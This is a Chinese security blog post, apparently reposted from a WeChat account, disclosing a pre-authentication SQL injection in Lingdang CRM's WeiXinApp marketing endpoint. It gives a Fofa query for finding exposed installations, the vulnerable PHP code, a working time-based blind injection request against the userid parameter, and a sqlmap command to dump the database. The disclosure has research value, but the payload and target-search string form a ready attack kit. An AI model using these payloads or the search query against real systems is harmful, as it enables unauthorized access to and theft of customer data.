灵当CRM存在前台SQL注入漏洞

admin 2024年11月7日16:19:59评论15 views字数 4137阅读13分47秒阅读模式
 

0x00 前言

灵当CRM致力于为企业提供客户管理数字化、销售管理自动化、服务管理智能化、项目管理一体化的个性化CRM行业解决方案,构建全生命周期的数字化管理体系,实现可持续的业绩增长,新一代个性化CRM,聚焦本地私有化部署.实现管理、财务多系统集成,支持多种ERP接口,统一管理数据,共享互联消除信息化孤岛,真正做到数字化管理无障碍。

Fofa:body="include/js/ldAjax.js"

灵当CRM存在前台SQL注入漏洞灵当CRM存在前台SQL注入漏洞

0x01 漏洞分析

位于 /crm/WeiXinApp/marketing/index.php 是以控制器形式进行操作的,直接通过 require_once 引入了6个控制器,然后 $_REQUEST 传入 module 作为模块名,传入 action 为具体的方法名.

<?phpheader("Access-Control-Allow-Origin:*");error_reporting(E_ALL^E_NOTICE^E_WARNING);header('Content-Type:text/html;charset=UTF-8');header("Access-Control-Allow-Methods: GET, POST, OPTIONS");header("Access-Control-Allow-Headers: Origin, No-Cache, X-Requested-With, If-Modified-Since, Pragma, Last-Modified, Cache-Control, Expires, Content-Type, X-E4M-With");$root_dir=dirname(dirname(dirname(__FILE__)));//获取根目录include($root_dir.'/includefile.php');// require_once($root_dir.'/include/Zend/Json.php');require_once($root_dir.'/WeiXinApp/marketing/controller/WxCrawler.php');require_once($root_dir.'/WeiXinApp/marketing/controller/WxUsers.php');require_once($root_dir.'/WeiXinApp/marketing/controller/WxArticles.php');require_once($root_dir.'/WeiXinApp/marketing/controller/WxAmbassador.php');require_once($root_dir.'/WeiXinApp/marketing/controller/SmsSender.php');require_once($root_dir.'/WeiXinApp/marketing/controller/WxOrder.php');$obj = new  WechatPublic($root_dir);/*** * 此处支持的是微信的授权用户入表操作 */if(isset($_REQUEST['function'])){    $function = $_REQUEST["function"];    $res = $obj->$function();    echo ldcrm_json_encode($res);}// action module/** * 此处支持的是微信获客文章常用-获取文章列表详情等等 */$module = $_REQUEST['module'];global $adb;switch ($module){    case "Articles":$controller = new WxArticles($adb,$root_dir);break;    case "Users":$controller = new WxUsers($adb,$root_dir);break;    case "Ambassador":$controller = new WxAmbassador($adb,$root_dir);break;    case "SmsSender":$controller = new SmsSender($adb,$root_dir);break;    case "WxOrder":$controller = new WxOrder($adb,$root_dir);break;    default :$controller = new WechatPublic($root_dir);break;}if(isset($_REQUEST['action'])){    $action  = $_REQUEST['action'];    $res = $controller->$action();    if($action!="viewpdf"){        if(isset($res['code'])){            $code = $res['code'];            unset($res['code']);        }else{            $code = 1;        }        $_REQUEST['diony'] = 'yes';        ConvertTojsonString($code,$res,'success');    }}

实际在 /crm/WeiXinApp/marketing/controller/WxUsers.php 控制器的 getActionList 方法通过 $_REQUEST 传入userid参数,并且直接带入到SQL查询中,导致漏洞产生.

/**     * @return array[]     * @throws Exception     * 获取当前用户来访客户日志列表 like点赞  look浏览  share转发  copy转载(领取)     */public function getActionList(){    $userid = $_REQUEST['userid'];    $operate = $_REQUEST['operate'];    $keyWords = $_REQUEST['keyWords'];    $page = $_REQUEST['page'];    $limit = 10;    $start = $page*$limit;    $where = "";    if(empty($keyWords)){      $where .= " 1=1 ";    }else{      $where .= " (locate(trim('$keyWords'),u.nickname)>0) ";    }    if($operate == 'like'){      $where .= " and (l.type = 'like' or l.type = 'unlike')";    }else{      $where .= " and l.type = '".$operate."'";    }    //剔除自己的数据    $where .= " and l.wx_user_id<>".$userid;    //$select_sql = "select u.nickname,u.avatar,a.title,l.createdtime,l.type from ld_wx_user_log l left join ld_articles a on l.articlesid=a.articlesid left join ld_wx_users u on u.id=a.wx_user_id where wx_user_id = ? and ".$where;    $count_sql = "select distinct u.id from ld_wx_user_log l inner join ld_articles a on l.articlesid=a.articlesid left join ld_wx_users u on u.id=l.wx_user_id where a.wx_user_id = ? and a.deleted=0 and ".$where;    $count_res = $this->adb->pquery($count_sql,[$userid]);    $totalRows = $this->adb->num_rows($count_res);    $pages = ceil($totalRows/$limit);

0x02 漏洞复现

Payload:

GET /crm/WeiXinApp/marketing/index.php?module=Users&action=getActionList&userid=%27%20AND%20(SELECT%203408%20FROM%20(SELECT(SLEEP(5)))HtiS)--%20cbVc HTTP/1.1Host: 127.0.0.1Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close

灵当CRM存在前台SQL注入漏洞

Python sqlmap.py -u "http://website/crm/WeiXinApp/marketing/index.php?module=Users&action=getActionList&userid=1" --level=3 --dbms=mysql

灵当CRM存在前台SQL注入漏洞

标签:代码审计,0day,渗透测试,系统,通用,0day,闲鱼,转转

灵当CRM源码关注公众号发送 241013 获取!

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,文章作者和本公众号不承担任何法律及连带责任,望周知!!!

原文始发于微信公众号(星悦安全):(1day) 灵当CRM存在前台SQL注入漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年11月7日16:19:59
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   灵当CRM存在前台SQL注入漏洞https://cn-sec.com/archives/3368889.html

发表评论

匿名网友 填写信息